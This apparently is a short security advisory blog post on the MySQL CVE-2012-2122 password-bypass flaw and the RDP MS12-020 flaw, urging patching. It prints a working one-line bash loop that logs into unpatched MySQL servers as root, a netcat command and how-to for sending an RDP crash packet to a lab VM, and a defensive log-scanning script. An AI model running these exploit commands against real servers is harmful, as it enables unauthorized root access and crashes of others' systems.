A new vulnerability discovered in MySQL Server allows an attacker to gain remote root privileges. According to the original article posted on SC Magazine, “Security experts have identified some 879,046 servers vulnerable to a brute force flaw that undermines password controls in MySQL and MariaDB systems.”
This critical vulnerability, CVE-2012-2122, has already been patched, so you have to fix your MySQL server as soon as possible.
The Python script is still available on Exploit-DB and can be converted into a single-line Bash script:
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
Patch your MySQL!
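A defender-side check to go with the loop above, as an added example that is not from the original post: it counts denied logins per account and source host in a MySQL error log and reports every pair at or above a threshold. It assumes denied connections are written to the error log (log_warnings=2 on MySQL 5.x); the function names and the sample log lines are constructed for illustration.

```sh
# Added example, not from the original post. Sample log lines are constructed.
# Assumption: denied logins reach the MySQL error log (log_warnings=2 on 5.x)
# as: Access denied for user 'USER'@'HOST' (using password: YES)

# flag_denied_bursts LOGFILE [THRESHOLD]
# Prints "COUNT USER@HOST" for each account/source pair with at least
# THRESHOLD denied logins (default 100), highest count first.
flag_denied_bursts() {
    # Splitting on the single quote puts USER in $2 and HOST in $4.
    awk -F"'" -v min="${2:-100}" '
        /Access denied for user/ { n[$2 "@" $4]++ }
        END { for (k in n) if (n[k] >= min) print n[k], k }
    ' "$1" | sort -rn
}

# write_sample_log FILE
# Constructed data: 1000 failed root logins from one host (the trail a
# repeated-login loop leaves behind) plus ordinary noise.
write_sample_log() {
    awk -v q="'" 'BEGIN {
        for (i = 1; i <= 1000; i++)
            printf "120611 10:%02d:%02d [Warning] Access denied for user %sroot%s@%slocalhost%s (using password: YES)\n", int(i / 60), i % 60, q, q, q, q
        printf "120611 10:20:01 [Warning] Access denied for user %sapp%s@%s10.0.0.7%s (using password: YES)\n", q, q, q, q
        print "120611 10:20:05 [Note] /usr/sbin/mysqld: ready for connections."
    }' > "$1"
}

# Demo run on the constructed log.
log=$(mktemp)
write_sample_log "$log"
flag_denied_bursts "$log" 100
rm -f "$log"
```

A single mistyped password stays below the threshold; hundreds of denials for one account from one source in a short span is the pattern to alert on, especially when followed by a successful login for that account.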
The RDP protocol gives remote users interactive access to systems. It is often exposed directly to the Internet so that mobile users can connect to those systems.
A vulnerability was recently discovered that allows unauthorized users to execute malicious code; Microsoft has patched it via MS12-20. The vulnerability has been classified as critical.
The vulnerability applies to most versions of Microsoft Windows.
- The vulnerability allows remote code execution from an unauthenticated attacker.
- RDP is often allowed in from the Internet on the default port to manage various systems.
- Once an exploit becomes available, attackers can easily exploit the vulnerability on exposed and unpatched systems. Automated attacks are possible.
- It’s not all about attacks from the Internet; internally exposed RDP servers can be targeted by malicious internal users or by malware in case an internal machine becomes infected.
Please refer to http://aluigi.org/adv/termdd_1-adv.txt to read exploit details.
If you want to test the Proof Of Concept you can follow this How To:
- Start a Virtual Machine running a Windows Operating System
- If it is not already enabled, enable Remote Desktop on the Virtual Machine
- Be sure you can reach the Virtual Machine from your host system (e.g.: ping 10.10.10.1)
- Download the POC file from here (termdd_1.dat)
- Use NetCat to connect to the Virtual Machine, sending the exploit packet:
nc 10.10.10.1 3389 < termdd_1.dat
- Try several times to get a Blue Screen of Death.
There are also several POCs written in Ruby and available on pastebin.com: just copy and paste the code into a text file called rdpexploit.rb and set the Ruby path (the first line of the code must match your Ruby binary path). You need Ruby installed on the system to use it!
Read the Microsoft Security Bulletin for MS12-20